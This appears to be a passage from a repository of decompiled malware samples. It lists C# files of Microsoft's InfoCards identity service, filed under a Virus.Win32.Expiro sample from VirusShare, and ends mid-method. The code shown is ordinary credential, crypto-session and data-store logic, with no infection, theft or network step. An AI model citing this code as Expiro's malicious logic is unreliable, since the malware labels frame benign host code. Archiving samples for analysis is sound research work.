writer.WriteStartElement("PrivatePersonalIdentifier", "http://schemas.xmlsoap.org/ws/2005/05/identity");
string withoutNullTerminator = this.GetStringWithoutNullTerminator();
if (!string.IsNullOrEmpty(withoutNullTerminator))
writer.WriteString(withoutNullTerminator);
writer.WriteEndElement();
}
private void ReadUserNameSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("Username" != reader.LocalName || "http://schemas.xmlsoap.org/ws/2005/05/identity" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.UserNameSelector;
string data = reader.ReadElementContentAsString().Trim();
if (string.IsNullOrEmpty(data))
return;
this.SetValue(data);
}
private void ReadUserPrincipalNameSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("UserPrincipalName" != reader.LocalName || "http://schemas.xmlsoap.org/ws/2005/05/identity" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.UserPrincipalNameSelector;
}
private void ReadX509IssuerNameSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("X509IssuerName" != reader.LocalName || "http://www.w3.org/2000/09/xmldsig#" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.X509CertificateIssuerNameSelector;
string data = reader.ReadElementContentAsString().Trim();
if (string.IsNullOrEmpty(data))
return;
this.SetValue(data);
}
private void ReadX509IssuerSerialNumberSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("X509SerialNumber" != reader.LocalName || "http://www.w3.org/2000/09/xmldsig#" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.X509CertificateIssuerSerialNoSelector;
BigInt bigInt = new BigInt();
string decNum = reader.ReadElementContentAsString().Trim();
try
{
if (string.IsNullOrEmpty(decNum))
return;
bigInt.FromDecimal(decNum);
byte[] byteArray = bigInt.ToByteArray();
this.SetValue(byteArray, 0, byteArray.Length);
}
catch (FormatException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidCardException(SR.GetString("ServiceInvalidSerialNumber")));
}
}
private void ReadX509KeyIdentifierSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("KeyIdentifier" != reader.LocalName || "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.X509CertificateKeyHashSelector;
string attribute = reader.GetAttribute("ValueType");
if (string.IsNullOrEmpty(attribute))
attribute = reader.GetAttribute("ValueType", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd");
if ("http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1" != attribute && "http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1" != attribute)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidCardException(SR.GetString("ServiceUnsupportedKeyIdentifierType")));
try
{
MemoryStream memoryStream = Utility.ReadByteStreamFromBase64(reader);
int int32 = Convert.ToInt32(memoryStream.Length);
if (int32 <= 0)
return;
this.SetValue(memoryStream.GetBuffer(), 0, int32);
}
catch (FormatException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidCardException(SR.GetString("ServiceInvalidThumbPrintValue")));
}
}
private void ReadSelfIssuedSelector(XmlReader reader)
{
InfoCardTrace.ThrowInvalidArgumentConditional("PrivatePersonalIdentifier" != reader.LocalName || "http://schemas.xmlsoap.org/ws/2005/05/identity" != reader.NamespaceURI, reader.LocalName);
this.Type = CredentialSelectorType.SelfIssuedCardIdSelector;
string data = reader.ReadElementContentAsString().Trim();
if (string.IsNullOrEmpty(data))
return;
this.SetValue(data);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CredentialSelectorType.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CredentialSelectorType
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal enum CredentialSelectorType
{
InvalidSelector = -1, // 0xFFFFFFFF
X509CertificateIssuerNameSelector = 0,
X509CertificateIssuerSerialNoSelector = 1,
X509CertificateKeyHashSelector = 2,
X509CertificateKeyIdSelector = 3,
UserNameSelector = 4,
SpnSelector = 5,
SelfIssuedCardIdSelector = 6,
RsaKeyValueSelector = 7,
UserPrincipalNameSelector = 8,
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CryptoSession.cs
+232
View File
@@ -0,0 +1,232 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CryptoSession
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Threading;
namespace Microsoft.InfoCards
{
internal abstract class CryptoSession
{
private const int m_MaxSessionCount = 1073741823;
public static readonly TimeSpan MaxSessionLifetime = new TimeSpan(1, 0, 0);
private static CryptoSession.CryptoSessionDictionary s_sessionCollection = new CryptoSession.CryptoSessionDictionary();
private static object s_syncRoot = new object();
private Process m_process;
private int m_sessionid;
private EventHandler m_processExitHandler;
private EventHandler m_serviceStoppingHandler;
private Timer m_timer;
private bool m_isDisposed;
private object m_syncRoot;
private WindowsIdentity m_identity;
private DateTime m_expiration;
private CryptoSession.SessionType m_type;
protected CryptoSession(
Process process,
DateTime expiration,
WindowsIdentity identity,
object key,
CryptoSession.SessionType type)
{
InfoCardTrace.Assert(null != key, "null key passed in to CryptoSession ctor");
try
{
this.m_process = ProcessMonitor.GetProcessById(process.Id);
}
catch (ArgumentException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ProcessExitedException(SR.GetString("ServiceClientProcessExited", (object) process.Id), (Exception) ex));
}
this.m_syncRoot = new object();
this.m_identity = identity;
this.m_expiration = expiration;
this.m_type = type;
lock (CryptoSession.s_syncRoot)
{
int newHandle;
try
{
newHandle = CryptoSession.s_sessionCollection.GetNewHandle();
}
catch (IndexOutOfRangeException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ServiceBusyException(SR.GetString("ServiceTooManyCryptoSessions", (object) CryptoSession.s_sessionCollection.MaxSize), (Exception) ex));
}
bool flag = false;
try
{
this.m_processExitHandler = new EventHandler(this.OnProcessExit);
this.m_process.Exited += this.m_processExitHandler;
if (process.HasExited || this.m_process.HasExited)
throw InfoCardTrace.ThrowHelperError((Exception) new ProcessExitedException(SR.GetString("ServiceProcessHasExited")));
TimeSpan dueTime = expiration - DateTime.UtcNow;
if (dueTime > CryptoSession.MaxSessionLifetime)
dueTime = CryptoSession.MaxSessionLifetime;
this.m_timer = new Timer(InfoCardTrace.ThunkCallback(new TimerCallback(this.OnTimeout)), (object) null, dueTime, new TimeSpan(0, 0, 0, 0, -1));
this.m_serviceStoppingHandler = new EventHandler(this.OnServiceStopping);
InfoCardService.Stopping += this.m_serviceStoppingHandler;
CryptoSession.s_sessionCollection[newHandle] = this;
this.m_sessionid = newHandle;
flag = true;
}
finally
{
if (!flag)
CryptoSession.s_sessionCollection.Remove(newHandle);
}
}
}
protected uint ProcessId => (uint) this.m_process.Id;
protected Process ProcessObj => this.m_process;
protected WindowsIdentity Identity => this.m_identity;
protected SecurityIdentifier ClientSid => this.m_identity.User;
protected DateTime Expiration => this.m_expiration;
public void Write(BinaryWriter bwriter)
{
bwriter.Write((int) this.m_type);
bwriter.Write(this.m_sessionid);
bwriter.Write(this.m_expiration.ToFileTime());
this.OnWrite(bwriter);
}
private void OnTimeout(object state) => this.Dispose();
private void OnProcessExit(object sender, EventArgs e) => this.DisposeAsClient();
private void OnServiceStopping(object sender, EventArgs e) => this.DisposeAsClient();
private void DisposeAsClient()
{
try
{
WindowsImpersonationContext impersonationContext = this.m_identity.Impersonate();
try
{
this.Dispose();
}
finally
{
impersonationContext.Undo();
}
}
catch (Exception ex)
{
throw;
}
}
protected void ThrowIfDisposed()
{
if (this.m_isDisposed)
throw InfoCardTrace.ThrowHelperError((Exception) new ObjectDisposedException("CryptoSession " + (object) this.m_sessionid));
}
protected virtual void OnDispose()
{
}
protected virtual void OnWrite(BinaryWriter bwriter)
{
}
public void Dispose()
{
bool flag = false;
lock (this.m_syncRoot)
{
if (!this.m_isDisposed)
{
this.m_isDisposed = true;
flag = true;
if (this.m_serviceStoppingHandler != null)
{
InfoCardService.Stopping -= this.m_serviceStoppingHandler;
this.m_serviceStoppingHandler = (EventHandler) null;
}
if (this.m_process != null)
{
if (this.m_processExitHandler != null)
{
this.m_process.Exited -= this.m_processExitHandler;
this.m_processExitHandler = (EventHandler) null;
}
this.m_process = (Process) null;
}
if (this.m_timer != null)
{
this.m_timer.Dispose();
this.m_timer = (Timer) null;
}
this.OnDispose();
}
}
if (!flag)
return;
lock (CryptoSession.s_syncRoot)
CryptoSession.s_sessionCollection.Remove(this.m_sessionid);
}
public static CryptoSession Create(
Process process,
DateTime expiration,
WindowsIdentity identity,
RSACryptoServiceProvider key)
{
return (CryptoSession) new AsymmetricCryptoSession(process, expiration, identity, key);
}
public static CryptoSession Create(
Process process,
DateTime expiration,
WindowsIdentity identity,
byte[] key)
{
return (CryptoSession) new SymmetricCryptoSession(process, expiration, identity, key);
}
public static CryptoSession Find(
int sessionId,
uint processId,
SecurityIdentifier clientSid)
{
CryptoSession cryptoSession;
lock (CryptoSession.s_syncRoot)
{
cryptoSession = CryptoSession.s_sessionCollection.ContainsHandle(sessionId) ? CryptoSession.s_sessionCollection[sessionId] : throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceUnknownCryptoSessionId")));
if ((int) cryptoSession.ProcessId != (int) processId)
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceUnknownCryptoSessionId")));
if (cryptoSession.ClientSid != clientSid)
throw InfoCardTrace.ThrowHelperError((Exception) new CommunicationException(SR.GetString("ServiceUnknownCryptoSessionId")));
}
return cryptoSession;
}
private class CryptoSessionDictionary : HandleDictionary<CryptoSession>
{
}
protected enum SessionType
{
Asymmetric = 1,
Symmetric = 2,
Transfrom = 3,
Hash = 4,
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CustomTokenProvider.cs
+94
View File
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CustomTokenProvider
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.ObjectModel;
using System.IdentityModel.Policy;
using System.IdentityModel.Selectors;
using System.IdentityModel.Tokens;
using System.ServiceModel;
using System.ServiceModel.Security.Tokens;
namespace Microsoft.InfoCards
{
internal class CustomTokenProvider : SecurityTokenProvider, IDisposable
{
private InfoCardPolicy m_policy;
private InfoCard m_card;
private IssuedSecurityTokenParameters m_parameters;
private TokenDescriptor m_token;
private EndpointAddress m_target;
private SelfIssuedSamlTokenFactory m_tokenFactory;
private bool m_isSelfIssuedCreds;
private ProtocolProfile m_protocolProfile;
private SelfIssuedAuthProofToken m_proofToken;
public CustomTokenProvider(
IssuedSecurityTokenParameters parameters,
InfoCard card,
EndpointAddress target,
bool isSelfIssuedCreds,
ProtocolProfile profile)
{
this.m_isSelfIssuedCreds = isSelfIssuedCreds;
this.m_card = card;
this.m_parameters = parameters;
this.m_target = target;
this.m_protocolProfile = profile;
this.ValidatePolicy();
this.m_tokenFactory = new SelfIssuedSamlTokenFactory();
}
public void Dispose()
{
if (this.m_token != null)
{
this.m_token.Dispose();
this.m_token = (TokenDescriptor) null;
}
if (this.m_proofToken == null)
return;
this.m_proofToken.Dispose();
this.m_proofToken = (SelfIssuedAuthProofToken) null;
}
private void ValidatePolicy()
{
try
{
this.m_policy = PolicyFactory.CreatePolicyForCustomTokenProvider(this.m_target, this.m_parameters, this.m_protocolProfile);
this.m_policy.SetRecipientInfo(this.m_policy.ImmediateTokenRecipient, (string) null, 0U);
if (this.m_isSelfIssuedCreds)
this.m_policy.ThrowIfNonPpidClaimsPresent();
this.m_policy.Validate();
}
catch (Exception ex)
{
if (!InfoCardTrace.IsFatal(ex))
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("FailedReadingIPSTSPolicy"), ex));
throw;
}
}
protected override SecurityToken GetTokenCore(TimeSpan timeout)
{
StoreConnection connection = StoreConnection.GetConnection();
this.m_card.Connection = connection;
try
{
this.m_token = this.m_tokenFactory.CreateToken(this.m_card, (TokenFactoryCredential) null, this.m_policy, false);
this.m_proofToken = this.m_token.SymmetricProof != null ? new SelfIssuedAuthProofToken(new InMemorySymmetricSecurityKey(this.m_token.SymmetricProof.Key), this.m_token.ExpirationTime) : new SelfIssuedAuthProofToken(this.m_card.GetPrivateCryptography(this.m_policy.Recipient.GetIdentifier()), this.m_token.ExpirationTime);
return (SecurityToken) new GenericXmlSecurityToken(this.m_token.ProtectedToken, (SecurityToken) this.m_proofToken, this.m_token.EffectiveTime, this.m_token.ExpirationTime, (SecurityKeyIdentifierClause) new SamlAssertionKeyIdentifierClause(this.m_token.TokenId), (SecurityKeyIdentifierClause) null, (ReadOnlyCollection<IAuthorizationPolicy>) null);
}
finally
{
connection.Close();
this.m_card.Connection = (StoreConnection) null;
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DataAccessException.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DataAccessException
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Runtime.Serialization;
namespace Microsoft.InfoCards
{
internal class DataAccessException : InfoCardBaseException
{
private const int HRESULT = -1073413887;
public DataAccessException()
: base(-1073413887)
{
}
public DataAccessException(string message)
: base(-1073413887, message)
{
}
public DataAccessException(string message, Exception inner)
: base(-1073413887, message, inner)
{
}
protected DataAccessException(SerializationInfo si, StreamingContext sc)
: base(-1073413887, si, sc)
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DataBlob.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DataBlob
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
namespace Microsoft.InfoCards
{
internal struct DataBlob
{
public int cbData;
public IntPtr pbData;
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DataRow.cs
+116
View File
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DataRow
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
namespace Microsoft.InfoCards
{
internal class DataRow
{
private string m_instanceId;
private string m_sourceId;
private int m_localId;
private int m_objectType;
private long m_lastChange;
private int m_objectSize;
private GlobalId m_globalId;
private byte[] m_buffer;
private DataRowIndexBuffer m_indexBuffer;
public DataRow()
: this((string) null, (string) null)
{
}
private DataRow(string instanceId, string sourceId)
{
this.m_instanceId = instanceId;
this.m_sourceId = sourceId;
this.m_indexBuffer = new DataRowIndexBuffer();
}
public GlobalId GlobalId
{
get => this.m_globalId;
set
{
this.m_globalId = !(GlobalId.Empty == value) ? value : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (value));
this.SetIndexValue("ix_globalid", (object) value);
}
}
public string InstanceId
{
get => this.m_instanceId;
internal set => this.m_instanceId = value;
}
public string SourceId
{
get => this.m_sourceId;
internal set => this.m_sourceId = value;
}
public long LastChange
{
get => this.m_lastChange;
internal set => this.m_lastChange = value;
}
public int LocalId
{
get => this.m_localId;
internal set => this.m_localId = value;
}
public int ObjectType
{
get => this.m_objectType;
set
{
this.m_objectType = value;
this.SetIndexValue("ix_objecttype", (object) value);
}
}
internal DataRowIndexBuffer IndexBuffer => this.m_indexBuffer;
public void SetDataField(byte[] buffer) => this.SetDataField(buffer, buffer.Length);
public void SetDataField(byte[] buffer, int size)
{
this.m_buffer = buffer;
this.m_objectSize = size;
}
public byte[] GetDataField() => this.m_buffer;
public void SetMultiIndexValue(string name, params object[][] multiValues)
{
IndexObject[] indexObjects = new IndexObject[multiValues.Length];
for (int index = 0; index < multiValues.Length; ++index)
indexObjects[index] = new IndexObject(multiValues[index]);
this.m_indexBuffer.SetIndexValues(name, indexObjects);
}
public void SetIndexValue(string name, params object[] values)
{
object[][] objArray = new object[values.Length][];
for (int index = 0; index < objArray.Length; ++index)
objArray[index] = new object[1]{ values[index] };
this.SetMultiIndexValue(name, objArray);
}
internal static unsafe DataRow Create(EncryptedObjectHeader* pHeader, DataSource source) => new DataRow(source.InstanceId, source.SourceId)
{
LastChange = pHeader->LastChange,
ObjectType = pHeader->ObjectType,
LocalId = pHeader->LocalId,
GlobalId = pHeader->GlobalId,
m_objectSize = pHeader->DataSize
};
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DataRowIndexBuffer.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DataRowIndexBuffer
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.Collections.Generic;
namespace Microsoft.InfoCards
{
internal class DataRowIndexBuffer
{
private Dictionary<string, List<IndexObject>> m_objects;
public DataRowIndexBuffer() => this.m_objects = new Dictionary<string, List<IndexObject>>();
public string[] GetIndexNames() => new List<string>((IEnumerable<string>) this.m_objects.Keys).ToArray();
public List<IndexObject> this[string name]
{
get
{
if (!this.m_objects.ContainsKey(name))
this.m_objects.Add(name, new List<IndexObject>());
return this.m_objects[name];
}
}
public void Clear() => this.m_objects.Clear();
public void ClearIndexValues(string name) => this.m_objects.Remove(name);
public void AddIndexValue(string name, IndexObject obj) => this[name].Add(obj);
public void AddIndexValues(string name, IndexObject[] objs) => this[name].AddRange((IEnumerable<IndexObject>) objs);
public void SetIndexValues(string name, IndexObject[] indexObjects)
{
this[name].Clear();
this[name].AddRange((IEnumerable<IndexObject>) indexObjects);
}
public int GetValueCount(string name) => !this.m_objects.ContainsKey(name) ? 0 : this.m_objects[name].Count;
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DataSource.cs
+328
View File
@@ -0,0 +1,328 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DataSource
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.Threading;
namespace Microsoft.InfoCards
{
internal abstract class DataSource : IDisposable
{
private string m_instanceId;
private bool m_isLoaded;
private ReaderWriterLock m_lock;
private bool m_isDisposed;
private string m_sourceId;
private bool m_isCleared;
protected DataSource(string instanceId, string sourceId)
{
this.m_instanceId = instanceId;
this.m_sourceId = sourceId;
this.m_lock = new ReaderWriterLock();
}
public string SourceId
{
get
{
this.ThrowIfDisposed();
return this.m_sourceId;
}
}
public bool IsDisposed => this.m_isDisposed;
public bool IsLoaded
{
get
{
this.ThrowIfDisposed();
return this.m_isLoaded;
}
}
public bool IsCleared
{
get => this.m_isCleared;
set => this.m_isCleared = value;
}
protected internal string InstanceId
{
get
{
this.ThrowIfDisposed();
return this.m_instanceId;
}
set
{
this.ThrowIfDisposed();
this.m_instanceId = value;
}
}
public bool IsProcessingTransaction()
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
return this.m_lock.IsWriterLockHeld;
}
public void BeginTransaction()
{
this.ThrowIfWriteLockHeld();
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
this.m_lock.AcquireWriterLock(0);
this.OnBeginTransaction();
}
public void CommitTransaction()
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
this.ThrowIfWriteLockNotHeld();
this.OnCommitTransaction();
this.m_lock.ReleaseWriterLock();
}
public void RollbackTransaction()
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
this.ThrowIfWriteLockNotHeld();
this.OnRollbackTransaction();
this.m_lock.ReleaseWriterLock();
}
public void Load()
{
this.ThrowIfDisposed();
this.OnLoad();
this.m_isLoaded = true;
}
public void Clear()
{
this.ThrowIfLoaded();
this.ThrowIfDisposed();
this.OnClear();
this.m_isLoaded = false;
this.m_isCleared = true;
}
public void Close()
{
if (!this.m_isLoaded)
return;
this.OnClose();
this.m_isLoaded = false;
}
public DataRow GetSingleRow(params QueryParameter[] objectQuery) => this.GetSingleRow(QueryDetails.FullRow, objectQuery);
public DataRow GetSingleRow(QueryDetails details, params QueryParameter[] objectQuery)
{
IList<DataRow> dataRowList = this.Query(details, objectQuery);
if (dataRowList == null || dataRowList.Count == 0)
return (DataRow) null;
return dataRowList.Count <= 1 ? dataRowList[0] : throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreMoreThanOneRowReturnedInSingleMatchQuery")));
}
public IList<DataRow> Query(params QueryParameter[] objectQuery) => this.Query(QueryDetails.FullRow, objectQuery);
public IList<DataRow> Query(
QueryDetails details,
params QueryParameter[] objectQuery)
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
if (objectQuery == null || objectQuery.Length == 0)
throw InfoCardTrace.ThrowHelperArgumentNull("query");
if (!this.IsValidQueryDetails(details))
throw InfoCardTrace.ThrowHelperError((Exception) new ArgumentException(nameof (details)));
if (details == QueryDetails.None)
return (IList<DataRow>) null;
LocalIdCollection localIdCollection1 = (LocalIdCollection) null;
bool flag = false;
try
{
try
{
}
finally
{
this.m_lock.AcquireReaderLock(0);
flag = true;
}
foreach (QueryParameter match in objectQuery)
{
LocalIdCollection localIdCollection2 = new LocalIdCollection();
if ("localid" == match.IndexName.ToLower(CultureInfo.InvariantCulture))
{
for (int index1 = 0; index1 < match.Count; ++index1)
{
for (int index2 = 0; index2 < match[index1].ObjectList.Length; ++index2)
{
int int32 = Convert.ToInt32(match[index1].ObjectList[index2], (IFormatProvider) NumberFormatInfo.InvariantInfo);
localIdCollection2.Add(int32);
}
}
}
else if (!this.SingleMatch(match, localIdCollection2))
{
if (localIdCollection1 != null)
{
localIdCollection1.Clear();
break;
}
break;
}
if (localIdCollection1 == null)
localIdCollection1 = localIdCollection2;
else
localIdCollection1.Filter(localIdCollection2);
}
}
finally
{
if (flag)
this.m_lock.ReleaseReaderLock();
}
if (localIdCollection1 == null || localIdCollection1.Count == 0)
return (IList<DataRow>) null;
List<DataRow> dataRowList = new List<DataRow>(localIdCollection1.Count);
foreach (int key in (IEnumerable<int>) localIdCollection1.Keys)
{
if (QueryDetails.Identifiers == details)
dataRowList.Add(new DataRow()
{
LocalId = key,
SourceId = this.SourceId,
InstanceId = this.InstanceId
});
else
dataRowList.Add(this.ReadRow(key, details));
}
return (IList<DataRow>) dataRowList;
}
public void Save(DataRow row)
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
this.ThrowIfWriteLockNotHeld();
if (row == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (row));
if ((!string.IsNullOrEmpty(row.InstanceId) || !string.IsNullOrEmpty(row.SourceId)) && (string.Compare(row.InstanceId, this.InstanceId, StringComparison.Ordinal) != 0 || string.Compare(row.SourceId, this.SourceId, StringComparison.Ordinal) != 0))
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreRowOwnedByOtherDataSource")));
row.LastChange = DateTime.Now.ToFileTimeUtc();
this.WriteRow(row);
row.InstanceId = this.InstanceId;
row.SourceId = this.SourceId;
}
public void Delete(DataRow row)
{
this.ThrowIfDisposed();
this.ThrowIfNotLoaded();
this.ThrowIfWriteLockNotHeld();
if (row == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (row));
if (row.InstanceId == null || row.SourceId == null)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreDataSourceRowNotOwned")));
if (string.Compare(row.InstanceId, this.InstanceId, StringComparison.Ordinal) != 0 || string.Compare(row.SourceId, this.SourceId, StringComparison.Ordinal) != 0)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreRowOwnedByOtherDataSource")));
this.RemoveObject(row.LocalId);
}
protected internal virtual bool IsValidQueryDetails(QueryDetails details)
{
if (QueryDetails.IndexData == (details & QueryDetails.IndexData))
return QueryDetails.FullRowAndIndexes == (details & QueryDetails.FullRowAndIndexes);
if (QueryDetails.DataBlob == (details & QueryDetails.DataBlob))
return QueryDetails.FullRow == (details & QueryDetails.FullRow);
if (QueryDetails.Header == (details & QueryDetails.Header))
return QueryDetails.FullHeader == (details & QueryDetails.FullHeader);
return QueryDetails.Identifiers == (details & QueryDetails.Identifiers) ? QueryDetails.Identifiers == (details & QueryDetails.Identifiers) : QueryDetails.None == details;
}
protected internal virtual void OnBeginTransaction() => this.ThrowIfDisposed();
protected internal virtual void OnCommitTransaction() => this.ThrowIfDisposed();
protected internal virtual void OnRollbackTransaction() => this.ThrowIfDisposed();
protected internal virtual void OnLoad() => this.ThrowIfDisposed();
protected internal virtual void OnClose() => this.ThrowIfDisposed();
protected internal virtual void OnClear() => this.ThrowIfDisposed();
protected internal virtual void OnDispose()
{
}
protected internal abstract void WriteRow(DataRow row);
protected internal abstract void RemoveObject(int id);
protected internal abstract DataRow ReadRow(int localId, QueryDetails details);
protected internal abstract bool SingleMatch(QueryParameter match, LocalIdCollection localIds);
void IDisposable.Dispose()
{
this.OnDispose();
this.m_isDisposed = true;
}
protected internal void ThrowIfWriteLockNotHeld()
{
if (!this.m_lock.IsWriterLockHeld)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreDataSourceWriteLockNotHeld")));
}
protected internal void ThrowIfWriteLockHeld()
{
if (this.m_lock.IsWriterLockHeld)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreProcessingTransaction")));
}
protected internal void ThrowIfNotLoaded()
{
if (!this.m_isLoaded)
throw InfoCardTrace.ThrowHelperError((Exception) new ObjectDisposedException(nameof (DataSource)));
}
protected internal void ThrowIfLoaded()
{
if (this.m_isLoaded)
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("StoreIsAlreadyLoaded")));
}
protected internal void ThrowIfDisposed()
{
